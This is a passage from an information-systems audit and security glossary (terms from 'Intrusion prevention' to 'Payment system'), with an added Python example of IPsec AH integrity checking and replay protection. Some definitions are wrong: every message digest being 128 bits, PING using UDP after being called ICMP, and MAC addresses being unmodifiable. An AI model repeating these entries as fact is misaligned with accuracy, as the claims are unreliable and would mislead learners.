A preemptive approach to network security used to identify potential threats and respond to them to stop, or at least limit, damage or disruption

Intrusion prevention system (IPS)
A system designed to not only detect attacks, but also to prevent the intended victim hosts from being affected by the attacks

Intrusive monitoring
In vulnerability analysis, gaining information by performing checks that affect the normal operation of the system, and even by crashing the system

Investigation
The collection and analysis of evidence with the goal of identifying the perpetrator of an attack or unauthorized use or access

Investment portfolio
The collection of investments being considered and/or being made
Scope Note: COBIT 5 perspective

IP address
A unique binary number used to identify devices on a TCP/IP network

IP Authentication Header (AH)
Protocol used to provide connectionless integrity and data origin authentication for IP datagrams (hereafter referred to as just "integrity") and to provide protection against replays. (RFC 4302)
Scope Note: AH ensures data integrity with an integrity check value (ICV) that a message authentication code, such as HMAC-MD5 or HMAC-SHA1, generates over the datagram (MD5 or SHA-1 alone is a hash, not a message authentication code; the keyed HMAC construction is what AH uses). To ensure data origin authentication, AH includes a secret shared key in the algorithm that it uses for authentication. To ensure replay protection, AH uses a sequence number field within the IP authentication header.
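The two mechanisms named in the Scope Note, worked as an added example that is not code from the glossary or from any IPsec implementation. The ICV is an HMAC-SHA1-96 over the AH header (ICV field zeroed) and the payload, keyed with the shared secret, and the receiver keeps a sliding anti-replay window driven by the sequence number in the style of RFC 4302 section 3.4.3. Simplifications, all assumptions of this example: the ICV covers only the AH header and payload (real AH also covers the immutable fields of the outer IP header), the key and SPI are constructed, and the Next Header value is fixed at 17 (UDP):

```python
"""Added example: the two AH mechanisms named in the Scope Note. The ICV is
an HMAC-SHA1-96 over the AH header (ICV field zeroed) and the payload, keyed
with the shared secret, and the receiver kee an anti-replay window driven by
the sequence number, in the style of RFC 4302 section 3.4.3. Simplifications,
all assumptions of this example: the ICV covers only the AH header and
payload (real AH also covers the immutable fields of the outer IP header),
the key is constructed, and the 'next header' value is fixed at 17 (UDP)."""
import hashlib
import hmac
import struct

AH_FIXED_LEN = 12     # next header, payload len, reserved, SPI, sequence number
ICV_LEN = 12          # HMAC-SHA1-96: 160-bit tag truncated to 96 bits
NEXT_HEADER_UDP = 17


def ah_icv(key: bytes, hdr: bytes, payload: bytes) -> bytes:
    """Keyed MAC over the header (with the ICV field zeroed) and the payload."""
    return hmac.new(key, hdr + b"\x00" * ICV_LEN + payload, hashlib.sha1).digest()[:ICV_LEN]


def ah_build(key: bytes, spi: int, seq: int, payload: bytes) -> bytes:
    """Payload Len is the AH length in 32-bit words minus 2: (12 + 12) / 4 - 2 = 4."""
    payload_len = (AH_FIXED_LEN + ICV_LEN) // 4 - 2
    hdr = struct.pack("!BBHII", NEXT_HEADER_UDP, payload_len, 0, spi, seq)
    return hdr + ah_icv(key, hdr, payload) + payload


class AhReceiver:
    """Verifies the ICV and enforces a sliding anti-replay window of `window` sequence numbers."""

    def __init__(self, key: bytes, window: int = 64):
        self.key = key
        self.window = window
        self.top = 0        # highest sequence number accepted so far
        self.bitmap = 0     # bit d set means sequence number (top - d) was already accepted

    def _replay_status(self, seq: int) -> str:
        if seq == 0:
            return "seq zero"               # the first packet on an SA carries 1, never 0
        if seq > self.top:
            return "ok"
        diff = self.top - seq
        if diff >= self.window:
            return "too old"
        if (self.bitmap >> diff) & 1:
            return "replay"
        return "ok"

    def _mark(self, seq: int) -> None:
        mask = (1 << self.window) - 1
        if seq > self.top:
            shift = seq - self.top
            self.bitmap = 1 if shift >= self.window else ((self.bitmap << shift) | 1) & mask
            self.top = seq
        else:
            self.bitmap |= 1 << (self.top - seq)

    def verify(self, packet: bytes):
        """Returns (accepted, reason). Order follows RFC 4302: cheap replay check
        first, then the ICV, and the window is updated only after the ICV passes,
        so a forged packet cannot advance the window."""
        if len(packet) < AH_FIXED_LEN + ICV_LEN:
            return False, "short"
        hdr = packet[:AH_FIXED_LEN]
        icv = packet[AH_FIXED_LEN:AH_FIXED_LEN + ICV_LEN]
        payload = packet[AH_FIXED_LEN + ICV_LEN:]
        seq = struct.unpack("!I", hdr[8:12])[0]
        status = self._replay_status(seq)
        if status != "ok":
            return False, status
        if not hmac.compare_digest(icv, ah_icv(self.key, hdr, payload)):
            return False, "bad icv"
        self._mark(seq)
        return True, "ok"


KEY = bytes.fromhex("0f" * 20)   # constructed shared secret
SPI = 0x1000


def demo():
    rx = AhReceiver(KEY)
    p1 = ah_build(KEY, SPI, 1, b"first datagram")
    p2 = ah_build(KEY, SPI, 2, b"second datagram")
    p3 = ah_build(KEY, SPI, 3, b"third datagram")
    tampered = p3[:-1] + bytes([p3[-1] ^ 0xFF])      # one payload byte changed in flight
    return [rx.verify(p1), rx.verify(p2), rx.verify(p1), rx.verify(tampered), rx.verify(p3)]


if __name__ == "__main__":
    print(demo())   # replayed p1 is rejected; tampered p3 fails the ICV; genuine p3 still passes
```

The ordering in verify is the practitioner's detail: rejecting replays before computing the HMAC keeps a flood of replayed packets cheap to drop, and marking the window only after the ICV passes keeps an attacker from pushing the window forward with forged sequence numbers.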
IP Security (IPSec)
A set of protocols developed by the Internet Engineering Task Force (IETF) to support the secure exchange of packets

Irregularity
Violation of an established management policy or regulatory requirement. It may consist of deliberate misstatements or omission of information concerning the area under audit or the enterprise as a whole, gross negligence or unintentional illegal acts.
ISO 9001:2000
Code of practice for quality management from the International Organization for Standardization (ISO). ISO 9001:2000 specifies requirements for a quality management system for any enterprise that needs to demonstrate its ability to consistently provide products or services that meet particular quality targets.

ISO/IEC 17799
This standard defines information's confidentiality, integrity and availability controls in a comprehensive information security management system.
Scope Note: Originally released as part of the British Standard for Information Security in 1999 and then as the Code of Practice for Information Security Management in October 2000, it was elevated by the International Organization for Standardization (ISO) to an international code of practice for information security management. The latest version is ISO/IEC 17799:2005 (since renumbered as ISO/IEC 27002).

ISO/IEC 27001
Information Security Management Specification with Guidance for Use; the replacement for BS 7799-2. It is intended to provide the foundation for third-party audit and is harmonized with other management standards, such as ISO 9001 and ISO 14001.

IT application
Electronic functionality that constitutes parts of business processes undertaken by, or with the assistance of, IT
Scope Note: COBIT 5 perspective

IT architecture
Description of the fundamental underlying design of the IT components of the business, the relationships among them, and the manner in which they support the enterprise's objectives

IT goal
A statement describing a desired outcome of enterprise IT in support of enterprise goals. An outcome can be an artifact, a significant change of a state or a significant capability improvement.
Scope Note: COBIT 5 perspective

IT governance
The responsibility of executives and the board of directors; consists of the leadership, organizational structures and processes that ensure that the enterprise's IT sustains and extends the enterprise's strategies and objectives

IT governance framework
A model that integrates a set of guidelines, policies and methods that represent the organizational approach to IT governance
Scope Note: Per COBIT, IT governance is the responsibility of the board of directors and executive management. It is an integral part of institutional governance and consists of the leadership and organizational structures and processes that ensure that the enterprise's IT sustains and extends the enterprise's strategy and objectives.

IT Governance Institute (ITGI)
Founded in 1998 by the Information Systems Audit and Control Association (now known as ISACA). ITGI strives to assist enterprise leadership in ensuring long-term, sustainable enterprise success and to increase stakeholder value by expanding awareness.

IT incident
Any event that is not part of the ordinary operation of a service that causes, or may cause, an interruption to, or a reduction in, the quality of that service
IT infrastructure
The set of hardware, software and facilities that integrates an enterprise's IT assets
Scope Note: Specifically, the equipment (including servers, routers, switches and cabling), software, services and products used in storing, processing, transmitting and displaying all forms of information for the enterprise's users

IT investment dashboard
A tool for setting expectations for an enterprise at each level and continuous monitoring of the performance against set targets for expenditures on, and returns from, IT-enabled investment projects in terms of business values

IT risk
The business risk associated with the use, ownership, operation, involvement, influence and adoption of IT within an enterprise

IT risk issue
1. An instance of IT risk
2. A combination of control, value and threat conditions that impose a noteworthy level of IT risk

IT risk profile
A description of the overall (identified) IT risk to which the enterprise is exposed

IT risk register
A repository of the key attributes of potential and known IT risk issues
Attributes may include name, description, owner, expected/actual frequency, potential/actual magnitude, potential/actual business impact, disposition.

IT risk scenario
The description of an IT-related event that can lead to a business impact

IT service
The day-to-day provision to customers of IT infrastructure and applications and support for their use, e.g., service desk, equipment supply and moves, and security authorizations
Scope Note: COBIT 5 perspective

IT steering committee
An executive-management-level committee that assists in the delivery of the IT strategy, oversees day-to-day management of IT service delivery and IT projects, and focuses on implementation aspects

IT strategic plan
A long-term plan (i.e., three- to five-year horizon) in which business and IT management cooperatively describe how IT resources will contribute to the enterprise's strategic objectives (goals)

IT strategy committee
A committee at the level of the board of directors to ensure that the board is involved in major IT matters and decisions
Scope Note: The committee is primarily accountable for managing the portfolios of IT-enabled investments, IT services and other IT resources. The committee is the owner of the portfolio.

IT tactical plan
A medium-term plan (i.e., six- to 18-month horizon) that translates the IT strategic plan direction into required initiatives, resource requirements and ways in which resources and benefits will be monitored and managed

IT user
A person who uses IT to support or achieve a business objective

ITIL (IT Infrastructure Library)
The UK Office of Government Commerce (OGC) IT Infrastructure Library. A set of guides on the management and provision of operational IT services
IT-related incident
An IT-related event that causes an operational, developmental and/or strategic business impact

Job control language (JCL)
Used to control run routines in connection with performing tasks on a computer

Journal entry
A debit or credit to a general ledger account, in Oracle
See also Manual Journal Entry.

Judgment sampling
Any sample that is selected subjectively or in such a manner that the sample selection process is not random or the sampling results are not evaluated mathematically

Kernel mode
Used for execution of privileged instructions for the internal operation of the system. In kernel mode, there are no protections from errors or malicious activity and all parts of the system and memory are accessible.

Key goal indicator (KGI)
A measure that tells management, after the fact, whether an IT process has achieved its business requirements; usually expressed in terms of information criteria

Key length
The size of the encryption key measured in bits

Key management practice
Management practices that are required to successfully execute business processes

Key performance indicator (KPI)
A measure that determines how well the process is performing in enabling the goal to be reached
Scope Note: A lead indicator of whether a goal will likely be reached, and a good indicator of capabilities, practices and skills. It measures an activity goal, which is an action that the process owner must take to achieve effective process performance.

Key risk indicator (KRI)
A subset of risk indicators that are highly relevant and possess a high probability of predicting or indicating important risk
Scope Note: See also Risk Indicator.

Keylogger
Software used to record all keystrokes on a computer

Knowledge portal
Refers to the repository of a core of information and knowledge for the extended enterprise
Scope Note: Generally a web-based implementation containing a core repository of information provided for the extended enterprise to resolve any issues

Latency
The delay before a system or network responds
Scope Note: More specifically, system latency is the time that a system takes to retrieve data. Network latency is the time it takes for a packet to travel from the source to the final destination.

Layer 2 switches
Data link level devices that can divide and interconnect network segments and help to reduce collision domains in Ethernet-based networks

Layer 3 and 4 switches
Switches with operating capabilities at layer 3 and layer 4 of the open systems interconnect (OSI) model. These switches look at the incoming packet's networking protocol, e.g., IP, and then compare the destination IP address to the list of addresses in their tables, to actively calculate the best way to send a packet to its destination.
Layer 4-7 switches: Used for load balancing among groups of servers
Scope Note: Also known as content switches, content services switches, web switches or application switches.
Leadership: The ability and process to translate vision into desired behaviors that are followed at all levels of the extended enterprise
Leased line: A communication line permanently assigned to connect two points, as opposed to a dial-up line that is only available and open when a connection is made by dialing the target machine or network
Also known as a dedicated line
Legacy system: Outdated computer systems
Level of assurance: Refers to the degree to which the subject matter has been examined or reviewed
Librarian: The individual responsible for the safeguard and maintenance of all program and data files
Licensing agreement: A contract that establishes the terms and conditions under which a piece of software is being licensed (i.e., made legally available for use) from the software developer (owner) to the user
Life cycle: A series of stages that characterize the course of existence of an organizational investment (e.g., product, project, program)
Likelihood: The probability of something happening
Limit check: Tests specified amount fields against stipulated high or low limits of acceptability
Scope Note: When both high and low values are used, the test may be called a range check.
Link editor (linkage editor): A utility program that combines several separately compiled modules into one, resolving internal references between them
Literals: Any notation for representing a value within programming language source code (e.g., a string literal); a chunk of input data that is represented "as is" in compressed data
Local area network (LAN): Communication network that serves several users within a specified geographic area
Scope Note: A personal computer LAN functions as a distributed processing system in which each computer in the network does its own processing and manages some of its data. Shared data are stored in a file server that acts as a remote disk drive for all users in the network.
Log: To record details of information or events in an organized record-keeping system, usually sequenced in the order in which they occurred
Logical access: Ability to interact with computer resources granted using identification, authentication and authorization.
Logical access controls: The policies, procedures, organizational structure and electronic access controls designed to restrict access to computer software and data files
Logoff: The act of disconnecting from the computer
Logon: The act of connecting to the computer, which typically requires entry of a user ID and password into a computer terminal
Logs/log file: Files created specifically to record various actions occurring on the system to be monitored, such as failed login attempts, full disk drives and email delivery failures
Loss event: Any event during which a threat event results in loss
Scope Note: From Jones, J.; "FAIR Taxonomy," Risk Management Insight, USA, 2008
MAC header: Represents the hardware address of a network interface controller (NIC) inside a data packet
Machine language: The logical language that a computer understands
Magnetic card reader: Reads cards with a magnetic surface on which data can be stored and retrieved
Magnetic ink character recognition (MICR): Used to electronically input, read and interpret information directly from a source document
Scope Note: MICR requires the source document to have specially coded magnetic ink
Magnitude: A measure of the potential severity of loss or the potential gain from realized events/scenarios
Mail relay server: An electronic mail (email) server that relays messages so that neither the sender nor the recipient is a local user
Mainframe: A large high-speed computer, especially one supporting numerous workstations or peripherals
Malware: Short for malicious software
Designed to infiltrate, damage or obtain information from a computer system without the owner's consent
Scope Note: Malware is commonly taken to include computer viruses, worms, Trojan horses, spyware and adware. Spyware is generally used for marketing purposes and, as such, is not malicious, although it is generally unwanted. Spyware can, however, be used to gather information for identity theft or other clearly illicit purposes.
Management: Plans, builds, runs and monitors activities in alignment with the direction set by the governance body to achieve the enterprise objectives.
Management information system (MIS): An organized assembly of resources and procedures required to collect, process and distribute data for use in decision making
Mandatory access control (MAC): A means of restricting access to data based on varying degrees of security requirements for information contained in the objects and the corresponding security clearance of users or programs acting on their behalf
Man-in-the-middle attack: An attack strategy in which the attacker intercepts the communication stream between two parts of the victim system and then replaces the traffic between the two components with the intruder's own, eventually assuming control of the communication
Manual journal entry: A journal entry entered at a computer terminal
Scope Note: Manual journal entries can include regular, statistical, intercompany and foreign currency entries. See also Journal Entry.
Mapping: Diagramming data that are to be exchanged electronically, including how they are to be used and what business management systems need them.
See also Application Tracing and Mapping.
Scope Note: Mapping is a preliminary step for developing an applications link.
Masking: A computerized technique of blocking out the display of sensitive information, such as passwords, on a computer terminal or report
Masqueraders: Attackers that penetrate systems by using the identity of legitimate users and their logon credentials
Master file: A file of semipermanent information that is used frequently for processing data or for more than one purpose
Material misstatement: An accidental or intentional untrue statement that affects the results of an audit to a measurable extent
Material weakness: A deficiency or a combination of deficiencies in internal control, such that there is a reasonable possibility that a material misstatement will not be prevented or detected on a timely basis. Weakness in control is considered material if the absence of the control results in failure to provide reasonable assurance that the control objective will be met. A weakness classified as material implies that:
Controls are not in place and/or controls are not in use and/or controls are inadequate
Escalation is warranted
There is an inverse relationship between materiality and the level of audit risk acceptable to the IS auditor/assurance professional, i.e., the higher the materiality level, the lower the acceptability of the audit risk, and vice versa.
Materiality: An auditing concept regarding the importance of an item of information with regard to its impact or effect on the functioning of the entity being audited
An expression of the relative significance or importance of a particular matter in the context of the enterprise as a whole
Maturity: In business, indicates the degree of reliability or dependency that the business can place on a process achieving the desired goals or objectives
Maturity model
Scope Note: See Capability Maturity Model (CMM).
Maximum tolerable outages (MTO): Maximum time that an enterprise can support processing in alternate mode
Measure: A standard used to evaluate and communicate performance against expected results
Scope Note: Measures are normally quantitative in nature, capturing numbers, dollars, percentages, etc., but can also address qualitative information such as customer satisfaction. Reporting and monitoring measures help an enterprise gauge progress toward effective implementation of strategy.
Media access control (MAC): Applied to the hardware at the factory and cannot be modified, MAC is a unique, 48-bit, hard-coded address of a physical layer device, such as an Ethernet local area network (LAN) or a wireless network card
Media access control (MAC) address: A unique identifier assigned to network interfaces for communications on the physical network segment
Media oxidation: The deterioration of the media on which data are digitally stored due to exposure to oxygen and moisture
Scope Note: Tapes deteriorating in a warm, humid environment are an example of media oxidation. Proper environmental controls should prevent, or significantly slow, this process.
Memory dump: The act of copying raw data from one place to another with little or no formatting for readability
Scope Note: Usually, dump refers to copying data from the main memory to a display screen or a printer. Dumps are useful for diagnosing bugs. After a program fails, one can study the dump and analyze the contents of memory at the time of the failure. A memory dump will not help unless each person knows what to look for because dumps are usually output in a difficult-to-read form (binary, octal or hexadecimal).
Message authentication code: An American National Standards Institute (ANSI) standard checksum that is computed using Data Encryption Standard (DES)
Message digest: A smaller extrapolated version of the original message created using a message digest algorithm
Message digest algorithm: Message digest algorithms are SHA1, MD2, MD4 and MD5. These algorithms are one-way functions unlike private and public key encryption algorithms.
Scope Note: All digest algorithms take a message of arbitrary length and produce a 128-bit message digest.
Message switching: A telecommunications methodology that controls traffic in which a complete message is sent to a concentration point and stored until the communications path is established
Metric: A quantifiable entity that allows the measurement of the achievement of a process goal
Scope Note: Metrics should be SMART: specific, measurable, actionable, relevant and timely. Complete metric guidance defines the unit used, measurement frequency, ideal target value (if appropriate) and also the procedure to carry out the measurement and the procedure for the interpretation of the assessment.
Metropolitan area network (MAN): A data network intended to serve an area the size of a large city
Microwave transmission: A high-capacity line-of-sight transmission of data signals through the atmosphere which often requires relay stations
Middleware: Another term for an application programmer interface (API)
It refers to the interfaces that allow programmers to access lower- or higher-level services by providing an intermediary layer that includes function calls to the services.
Milestone: A terminal element that marks the completion of a work package or phase
Scope Note: Typically marked by a high-level event such as project completion, receipt, endorsement or signing of a previously defined deliverable or a high-level review meeting at which the appropriate level of project completion is determined and agreed to. A milestone is associated with a decision that outlines the future of a project and, for an outsourced project, may have a payment to the contractor associated with it.
Miniature fragment attack: Using this method, an attacker fragments the IP packet into smaller ones and pushes it through the firewall, in the hope that only the first of the sequence of fragmented packets would be examined and the others would pass without review.
Mirrored site: An alternate site that contains the same information as the original
Scope Note: Mirrored sites are set up for backup and disaster recovery and to balance the traffic load for numerous download requests. Such download mirrors are often placed in different locations throughout the Internet.
Mission-critical application: An application that is vital to the operation of the enterprise. The term is very popular for describing the applications required to run the day-to-day business.
Misuse detection: Detection on the basis of whether the system activity matches that defined as "bad"
Mobile computing: Extends the concept of wireless computing to devices that enable new kinds of applications and expand an enterprise network to reach places in circumstances that could never have been done by other means
Scope Note: Mobile computing is comprised of personal digital assistants (PDAs), cellular phones, laptops and other technologies of this kind.
Mobile device: A small, handheld computing device, typically having a display screen with touch input and/or a miniature keyboard and weighing less than two pounds
Mobile site: The use of a mobile/temporary facility to serve as a business resumption location
The facility can usually be delivered to any site and can house information technology and staff.
Model: A way to describe a given set of components and how those components relate to each other in order to describe the main workings of an object, system, or concept
Scope Note: COBIT 5 perspective
MODEM (modulator/demodulator): Connects a terminal or computer to a communications network via a telephone line
Modems turn digital pulses from the computer into frequencies within the audio range of the telephone system. When acting in the receiver capacity, a modem decodes incoming frequencies.
Modulation: The process of converting a digital computer signal into an analog telecommunications signal
Monetary unit sampling: A sampling technique that estimates the amount of overstatement in an account balance
Monitoring policy: Rules outlining or delineating the way in which information about the use of computers, networks, applications and information is captured and interpreted
Multifactor authentication: A combination of more than one authentication method, such as token and password (or personal identification number [PIN] or token and biometric device).
Multiplexor: A device used for combining several lower-speed channels into a higher-speed channel
Mutual takeover: A failover process, which is basically a two-way idle standby: two servers are configured so that both can take over the other node's resource group. Both must have enough central processing unit (CPU) power to run both applications with sufficient speed, or expected performance losses must be taken into account until the failed node reintegrates.
National Institute for Standards and Technology (NIST): Develops tests, test methods, reference data, proof-of-concept implementations, and technical analyses to advance the development and productive use of information technology
Scope Note: NIST is a US government entity that creates mandatory standards that are followed by federal agencies and those doing business with them.
Net present value (NPV): Calculated by using an after-tax discount rate of an investment and a series of expected incremental cash outflows (the initial investment and operational costs) and cash inflows (cost savings or revenues) that occur at regular periods during the life cycle of the investment
Scope Note: To arrive at a fair NPV calculation, cash inflows accrued by the business up to about five years after project deployment also should be taken into account.
Net return: The revenue that a project or business makes after tax and other deductions; often also classified as net profit
Netcat: A simple UNIX utility, which reads and writes data across network connections using Transmission Control Protocol (TCP) or User Datagram Protocol (UDP). It is designed to be a reliable back-end tool that can be used directly or is easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, because it can create almost any kind of connection needed and has several interesting built-in capabilities. Netcat is now part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions.
Net-centric technologies: The contents and security of information or objects (software and data) on the network are now of prime importance compared with traditional computer processing that emphasizes the location of hardware and its related software and data.
Scope Note: An example of net-centric technologies is the Internet, where the network is its primary concern.
Netware: A popular local area network (LAN) operating system (OS) developed by the Novell Corp.
Network: A system of interconnected computers and the communication equipment used to connect them
Network address translation (NAT): A methodology of modifying network address information in IP datagram packet headers while they are in transit across a traffic routing device for the purpose of remapping one IP address space into another
Network administrator: Responsible for planning, implementing and maintaining the telecommunications infrastructure; also may be responsible for voice networks
Scope Note: For smaller enterprises, the network administrator may also maintain a local area network (LAN) and assist end users.
Network attached storage (NAS): Utilizes dedicated storage devices that centralize storage of data
Scope Note: NAS devices generally do not provide traditional file/print or application services.
Network basic input/output system (NetBIOS): A program that allows applications on different computers to communicate within a local area network (LAN).
Network hop: An attack strategy in which the attacker successively hacks into a series of connected systems, obscuring his/her identity from the victim of the attack
Network interface card (NIC): A communication card that, when inserted into a computer, allows it to communicate with other computers on a network
Scope Note: Most NICs are designed for a particular type of network or protocol.
Network news transfer protocol (NNTP): Used for the distribution, inquiry, retrieval, and posting of Netnews articles using a reliable stream-based mechanism. For news-reading clients, NNTP enables retrieval of news articles that are stored in a central database, giving subscribers the ability to select only those articles they wish to read. (RFC 3977)
Network segmentation: A common technique to implement network security is to segment an organization's network into separate zones that can be separately controlled, monitored and protected.
Network traffic analysis: Identifies patterns in network communications
Scope Note: Traffic analysis does not need to have the actual content of the communication but analyzes where traffic is taking place, when and for how long communications occur and the size of information transferred.
Node: Point at which terminals are given access to a network
Noise: Disturbances in data transmissions, such as static, that cause messages to be misinterpreted by the receiver
Nondisclosure agreement (NDA): A legal contract between at least two parties that outlines confidential materials that the parties wish to share with one another for certain purposes, but wish to restrict from generalized use; a contract through which the parties agree not to disclose information covered by the agreement
Scope Note: Also called a confidential disclosure agreement (CDA), confidentiality agreement or secrecy agreement. An NDA creates a confidential relationship between the parties to protect any type of trade secret. As such, an NDA can protect nonpublic business information. In the case of certain governmental entities, the confidentiality of information other than trade secrets may be subject to applicable statutory requirements, and in some cases may be required to be revealed to an outside party requesting the information. Generally, the governmental entity will include a provision in the contract to allow the seller to review a request for information that the seller identifies as confidential and the seller may appeal such a decision requiring disclosure. NDAs are commonly signed when two companies or individuals are considering doing business together and need to understand the processes used in one
Nonintrusive monitoring: The use of transported probes or traces to assemble information, track traffic and identify vulnerabilities
Nonrepudiable transaction: Transaction that cannot be denied after the fact
Nonrepudiation: The assurance that a party cannot later deny originating data; provision of proof of the integrity and origin of the data and that can be verified by a third party
Scope Note: A digital signature can provide nonrepudiation.
Nonstatistical sampling: Method of selecting a portion of a population, by means of own judgement and experience, for the purpose of quickly confirming a proposition. This method does not allow drawing mathematical conclusions on the entire population.
Normalization: The elimination of redundant data
Numeric check: An edit check designed to ensure that the data element in a particular field is numeric.
Obfuscation: The deliberate act of creating source or machine code that is difficult for humans to understand
Object code: Machine-readable instructions produced from a compiler or assembler program that has accepted and translated the source code
Object management group (OMG): A consortium with more than 700 affiliates from the software industry whose purpose is to provide a common framework for developing applications using object-oriented programming techniques
Scope Note: For example, OMG is known principally for promulgating the Common Object Request Broker Architecture (CORBA) specification.
Object orientation: An approach to system development in which the basic unit of attention is an object, which represents an encapsulation of both data (an object's attributes) and functionality (an object's methods)
Scope Note: Objects usually are created using a general template called a class. A class is the basis for most design work in objects. A class and its objects communicate in defined ways. Aggregate classes interact through messages, which are directed requests for services from one class (the client) to another class (the server). A class may share the structure or methods defined in one or more other classes, a relationship known as inheritance.
Objective: Statement of a desired outcome
Scope Note: COBIT 5 perspective
Objectivity: The ability to exercise judgment, express opinions and present recommendations with impartiality
Object-oriented system development: A system development methodology that is organized around "objects" rather than "actions," and "data" rather than "logic"
Scope Note: Object-oriented analysis is an assessment of a physical system to determine which objects in the real world need to be represented as objects in a software system. Any object-oriented design is software design that is centered around designing the objects that will make up a program. Any object-oriented program is one that is composed of objects or software parts.
Offline files: Computer file storage media that are not physically connected to the computer; typical examples are tapes or tape cartridges used for backup purposes.
Offsite storage: A facility located away from the building housing the primary information processing facility (IPF), used for storage of computer media such as offline backup data and storage files
Online data processing: Achieved by entering information into the computer via a video display terminal
Scope Note: With online data processing, the computer immediately accepts or rejects the information as it is entered.
Open Source Security Testing Methodology: An open and freely available methodology and manual for security testing
Open system: System for which detailed specifications of the composition of its components are published in a nonproprietary environment, thereby enabling competing enterprises to use these standard components to build competitive systems
Scope Note: The advantages of using open systems include portability, interoperability and integration.
Open Systems Interconnect (OSI) model: A model for the design of a network. The open systems interconnect (OSI) model defines groups of functionality required to network computers into layers. Each layer implements a standard protocol to implement its functionality. There are seven layers in the OSI model.
Open Web Application Security Project (OWASP): An open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted
Operating system (OS): A master control program that runs the computer and acts as a scheduler and traffic controller
Scope Note: The operating system is the first program copied into the computer's memory after the computer is turned on; it must reside in memory at all times. It is the software that interfaces between the computer hardware (disk, keyboard, mouse, network, modem, printer) and the application software (word processor, spreadsheet, email), which also controls access to the devices and is partially responsible for security components and sets the standards for the application programs that run in it.
Operating system audit trail: Record of system events generated by a specialized operating system mechanism
Operational audit: An audit designed to evaluate the various internal controls, economy and efficiency of a function or department
Operational control: Deals with the everyday operation of a company or enterprise to ensure that all objectives are achieved
Operational level agreement (OLA): An internal agreement covering the delivery of services that support the IT organization in its delivery of services
Operator console: A special terminal used by computer operations personnel to control computer and systems operations functions
Scope Note: Operator console terminals typically provide a high level of computer access and should be properly secured.
Optical character recognition (OCR): Used to electronically scan and input written information from a source document
Optical scanner: An input device that reads characters and images that are printed or painted on a paper form into the computer
Organization: The manner in which an enterprise is structured; can also mean the entity
Organization for Economic Cooperation and Development (OECD): An international organization helping governments tackle the economic, social and governance challenges of a global economy
Scope Note: The OECD groups 30 member countries in a unique forum to discuss, develop, and refine economic and social policies.
Organizational structure: An enabler of governance and of management. Includes the enterprise and its structures, hierarchies and dependencies.
Scope Note: Example: Steering committee
COBIT 5 perspective
Outcome: Result
Outcome measure: Represents the consequences of actions previously taken; often referred to as a lag indicator
Scope Note: Outcome measures frequently focus on results at the end of a time period and characterize historic performance. They are also referred to as a key goal indicator (KGI) and used to indicate whether goals have been met. These can be measured only after the fact and, therefore, are called "lag indicators."
Output analyzer: Checks the accuracy of the results produced by a test run
Scope Note: There are three types of checks that an output analyzer can perform. First, if a standard set of test data and test results exist for a program, the output of a test run after program maintenance can be compared with the set of results that should be produced. Second, as programmers prepare test data and calculate the expected results, these results can be stored in a file and the output analyzer compares the actual results of a test run with the expected results. Third, the output analyzer can act as a query language; it accepts queries about whether certain relationships exist in the file of output results and reports compliance or noncompliance.
Outsourcing: A formal agreement with a third party to perform IS or other business functions for an enterprise
Owner: Individual or group that holds or possesses the rights of and the responsibilities for an enterprise, entity or asset.
Scope Note: Examples: process owner, system owner
COBIT 5 perspective
Packet: Data unit that is routed from source to destination in a packet-switched network
Scope Note: A packet contains both routing information and data. Transmission Control Protocol/Internet Protocol (TCP/IP) is such a packet-switched network.
Packet filtering: Controlling access to a network by analyzing the attributes of the incoming and outgoing packets and either letting them pass, or denying them, based on a list of rules
Packet internet groper (PING): An Internet program (Internet Control Message Protocol [ICMP]) used to determine whether a specific IP address is accessible or online
It is a network application that uses User Datagram Protocol (UDP) to verify reachability of another host on the connected network.
Scope Note: It works by sending a packet to the specified address and waiting for a reply. PING is used primarily to troubleshoot Internet connections. In addition, PING reports the number of hops required to connect two Internet hosts. There are both freeware and shareware PING utilities available for personal computers (PCs).
Packet switching: The process of transmitting messages in convenient pieces that can be reassembled at the destination
Paper test: A walk-through of the steps of a regular test, but without actually performing the steps
Scope Note: Usually used in disaster recovery and contingency testing; team members review and become familiar with the plans and their specific roles and responsibilities
Parallel simulation: Involves an IS auditor writing a program to replicate those application processes that are critical to an audit opinion and using this program to reprocess application system data
Scope Note: The results produced by parallel simulation are compared with the results generated by the application system and any discrepancies are identified.
Parallel testing: The process of feeding test data into two systems, the modified system and an alternative system (possibly the original system), and comparing results to demonstrate the consistency and inconsistency between two versions of the application
Parity check: A general hardware control that helps to detect data errors when data are read from memory or communicated from one computer to another
Scope Note: A 1-bit digit (either 0 or 1) is added to a data item to indicate whether the sum of that data item's bits is odd or even. When the parity bit disagrees with the sum of the other bits, the computer reports an error. The probability of a parity check detecting an error is 50 percent.
Partitioned file: A file format in which the file is divided into multiple subfiles and a directory is established to locate each subfile
Passive assault: Intruders attempt to learn some characteristic of the data being transmitted
Scope Note: With a passive assault, intruders may be able to read the contents of the data so the privacy of the data is violated. Alternatively, although the content of the data itself may remain secure, intruders may read and analyze the plaintext source and destination identifiers attached to a message for routing purposes, or they may examine the lengths and frequency of messages being transmitted.
Passive response: A response option in intrusion detection in which the system simply reports and records the problem detected, relying on the user to take subsequent action
Password: A protected, generally computer-encrypted string of characters that authenticate a computer user to the computer system
Password cracker: A tool that tests the strength of user passwords by searching for passwords that are easy to guess
It repeatedly tries words from specially crafted dictionaries and often also generates thousands (and in some cases, even millions) of permutations of characters, numbers and symbols.
Patch: Fixes to software programming errors and vulnerabilities
Patch management: An area of systems management that involves acquiring, testing and installing multiple patches (code changes) to an administered computer system in order to maintain up-to-date software and often to address security risk
Scope Note: Patch management tasks include the following: maintaining current knowledge of available patches; deciding what patches are appropriate for particular systems; ensuring that patches are installed properly; testing systems after installation; and documenting all associated procedures, such as specific configurations required. A number of products are available to automate patch management tasks. Patches are sometimes ineffective and can sometimes cause more problems than they fix. Patch management experts suggest that system administrators take simple steps to avoid problems, such as performing backups and testing patches on noncritical systems prior to installations. Patch management can be viewed as part of change management.
Payback period: The length of time needed to recoup the cost of capital investment
Scope Note: Financial amounts in the payback formula are not discounted. Note that the payback period does not take into account cash flows after the payback period and therefore is not a measure of the profitability of an investment project. The scope of the internal rate of return (IRR), net present value (NPV) and payback period is the useful economic life of the project up to a maximum of five years.
Payload: The section of fundamental data in a transmission. In malicious software this refers to the section containing the harmful data/code.
Payment system: A financial system that establishes the means for transferring money between suppliers and users of funds, ordinarily by exchanging debits or credits between banks or financial institutions
